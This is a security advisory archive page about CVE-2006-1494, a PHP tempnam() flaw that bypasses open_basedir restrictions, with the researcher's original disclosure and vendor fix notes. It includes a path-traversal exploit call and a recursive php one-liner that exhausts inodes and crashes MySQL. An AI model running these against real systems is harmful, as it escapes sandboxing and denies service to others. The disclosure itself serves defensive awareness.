SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP tempname() Argument Error Lets Users Bypass open_basedir Restrictions
SecurityTracker Alert ID:  1015881
SecurityTracker URL:  http://securitytracker.com/id/1015881
CVE Reference:   CVE-2006-1494   (Links to External Site)
Date:  Apr 9 2006
Impact:   Denial of service via local system, Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.4.2, 5.1.2
Description:   A vulnerability was reported in PHP in the tempname() function. A user can bypass open_basedir restrictions.

A user with the privileges to load arbitrary PHP code can create PHP code with a tempname() function that uses a specially crafted value for the second argument. When the function is executed, the system will create a temporary file in an arbitrary directory (outside of the basedir specification, but still subject to file system permissions).

This can be exploited to create numerous files on the target system and potentially deny service on the target system.

A demonstration exploit function is provided:

tempnam("/home", "../../../../../../tmp/cx");

Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.

The original advisory is available at:

http://securityreason.com/achievement_securityalert/36

Impact:   A user with the ability to load arbitrary PHP code can bypass open_basedir restrictions and create files on the target system.
Solution:   The vendor has issued a fixed version (5.1.3RC3), available at:

http://www.php.net/downloads.php

Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 12 2006 (Red Hat Issues Fix) PHP tempname() Argument Error Lets Users Bypass open_basedir Restrictions
Red Hat has released a fix for Red Hat Enterprise Linux 3 and 4.
Jul 25 2006 (Red Hat Issues Fix) PHP tempname() Argument Error Lets Users Bypass open_basedir Restrictions
Red Hat has released a fix for Red Hat Enterprise Linux 2.1.



 Source Message Contents

Subject:  [Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2

Source: http://securityreason.com/achievement_securityalert/36

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 
tempnam -- Create file with unique file name

- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

So, if we have open_basedir set to /home, we can't create file over /home 
directory.
In ext/standard/file.c (PHP 4.4.2)

- -550-578---
PHP_FUNCTION(tempnam)
{
	pval **arg1, **arg2;
	char *d;
	char *opened_path;
	char p[64];
	FILE *fp;

	if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == 
FAILURE) {
		WRONG_PARAM_COUNT;
	}
	convert_to_string_ex(arg1);
	convert_to_string_ex(arg2);

	if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
		RETURN_FALSE;
	}

	d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
	strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

	if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
		fclose(fp);
		RETVAL_STRING(opened_path, 0);
	} else {
		RETVAL_FALSE;
	}
	efree(d);
}
- -550-578---

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
	RETURN_FALSE;
}

Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir", 
"../../../../../../../../Open_basedir_bypasswd");

tempnam("/home", "../../../../../../tmp/cx");

etc.

It is low issue but you can try create a lot of files and overload inodes from 
HD.I have one particion.

/var /dev/ad0s1e    1.0G     97M    858M    10%    /var <- Space (B)
/dev/ad0s1e   1012974    94472  837466    10%    3796  137514    3%   /var <- 
INODES

where mysql and apache try create some file. WWhen we overload free inodes, 
system have big problem with apache, mysql.

Example:

cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); 
cx(); } cx();'
/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free
... etc

/usr/local/libexec/mysqld: Can't create/write to file 
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC